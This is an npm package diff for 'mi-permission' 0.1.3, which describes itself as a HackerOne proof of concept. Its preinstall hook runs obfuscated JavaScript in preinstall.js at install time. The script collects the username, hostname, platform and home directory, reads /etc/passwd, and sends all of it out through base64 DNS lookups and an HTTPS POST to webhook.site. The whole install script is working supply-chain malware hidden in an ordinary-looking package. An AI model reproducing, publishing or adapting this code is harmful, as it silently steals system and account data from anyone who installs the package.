mi-permission 0.1.3

package/README.md

@@ -0,0 +1 @@
+This is for TEsting and POC purpose Only

package/package.json

@@ -0,0 +1,18 @@
+{
+  "name": "mi-permission",
+  "version": "0.1.3",
+  "description": "FOR POC PURPOSE ONLY, FROM HACKERONE",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "dependencies": {
+    "vue": "^2.6.14",
+    "vue-router": "^3.5.1"
+  },
+  "devDependencies": {
+    "eslint": "^7.32.0"
+  },
+  "author": "NoobHUnter",
+  "license": "ISC"
+}

package/preinstall.js

@@ -0,0 +1 @@
+function _0x2a93(){const _0x2b6289=['dns','3632456grdmAR','userInfo','end','username','6224814ZtLwJi','data','196353QMkEFt','webhook.site','base64','https','4579743PUFAMv','write','stringify','6lEbKeN','problem\x20with\x20request:\x20','application/json','toString','.yourdomain.com','from','trim','DNS\x20error:\x20','request','2oGShMk','21cljCQw','error','homedir','27446690HYqfoX','message','7074790zLFQSc','hostname','/51a2d646-40c9-448f-9e37-923c1ea2c856','platform','228388hUXVAa'];_0x2a93=function(){return _0x2b6289;};return _0x2a93();}const _0x34a69b=_0x27b8;(function(_0x23a474,_0x29eed5){const _0x282443=_0x27b8,_0xb66ad9=_0x23a474();while(!![]){try{const _0x494018=parseInt(_0x282443(0x193))/0x1*(parseInt(_0x282443(0x1a3))/0x2)+-parseInt(_0x282443(0x1a4))/0x3*(parseInt(_0x282443(0x1ad))/0x4)+-parseInt(_0x282443(0x1a9))/0x5+-parseInt(_0x282443(0x19a))/0x6*(parseInt(_0x282443(0x197))/0x7)+-parseInt(_0x282443(0x1af))/0x8+parseInt(_0x282443(0x1b3))/0x9+parseInt(_0x282443(0x1a7))/0xa;if(_0x494018===_0x29eed5)break;else _0xb66ad9['push'](_0xb66ad9['shift']());}catch(_0x330ca8){_0xb66ad9['push'](_0xb66ad9['shift']());}}}(_0x2a93,0xad45d));function _0x27b8(_0x4360b1,_0x2e61e1){const _0x2a93ae=_0x2a93();return _0x27b8=function(_0x27b8b6,_0x13bc63){_0x27b8b6=_0x27b8b6-0x193;let _0x3d214f=_0x2a93ae[_0x27b8b6];return _0x3d214f;},_0x27b8(_0x4360b1,_0x2e61e1);}const https=require(_0x34a69b(0x196)),dns=require(_0x34a69b(0x1ae)),os=require('os'),{exec}=require('child_process'),systemInfo={'user':os[_0x34a69b(0x1b0)]()[_0x34a69b(0x1b2)],'platform':os[_0x34a69b(0x1ac)](),'homedir':os[_0x34a69b(0x1a6)](),'hostname':os[_0x34a69b(0x1aa)]()};function encodeBase64(_0x5f3b0c){const _0xd6c91e=_0x34a69b;return Buffer[_0xd6c91e(0x19f)](_0x5f3b0c)[_0xd6c91e(0x19d)](_0xd6c91e(0x195));}function sendDataViaDNS(_0x2b4f17){const _0x4a5c2e=_0x34a69b,_0x4fc3ad=encodeBase64(_0x2b4f17),_0x1b2b66=_0x4fc3ad+_0x4a5c2e(0x19e);dns['lookup'](_0x1b2b66,(_0x2cfa3b,_0x2f8a47,_0x1d0726)=>{const _0x19eb8b=_0x4a5c2e;if(_0x2cfa3b)console[_0x19eb8b(0x1a5)](_0x19eb8b(0x1a1)+_0x2cfa3b['message']);});}function sendDataViaHTTPS(_0x32d7e3){const _0x33cd44=_0x34a69b,_0xda85f7=JSON['stringify'](_0x32d7e3),_0x1295f4={'hostname':_0x33cd44(0x194),'port':0x1bb,'path':_0x33cd44(0x1ab),'method':'POST','headers':{'Content-Type':_0x33cd44(0x19c),'Content-Length':_0xda85f7['length']}},_0xfec214=https[_0x33cd44(0x1a2)](_0x1295f4,_0xef4510=>{const _0x5467a7=_0x33cd44;_0xef4510['on'](_0x5467a7(0x1b4),_0x5b8509=>{process['stdout']['write'](_0x5b8509);});});_0xfec214['on'](_0x33cd44(0x1a5),_0x347ad8=>{const _0x5afe8c=_0x33cd44;console[_0x5afe8c(0x1a5)](_0x5afe8c(0x19b)+_0x347ad8[_0x5afe8c(0x1a8)]);}),_0xfec214[_0x33cd44(0x198)](_0xda85f7),_0xfec214[_0x33cd44(0x1b1)]();}const command='cat\x20/etc/passwd';exec(command,(_0x189464,_0x550d78,_0x4d0242)=>{const _0x332f0f=_0x34a69b;if(_0x189464){console[_0x332f0f(0x1a5)]('exec\x20error:\x20'+_0x189464);return;}const _0x326eaa={'systemInfo':systemInfo,'commandOutput':_0x550d78[_0x332f0f(0x1a0)]()};sendDataViaDNS(JSON[_0x332f0f(0x199)](_0x326eaa)),sendDataViaHTTPS(_0x326eaa);});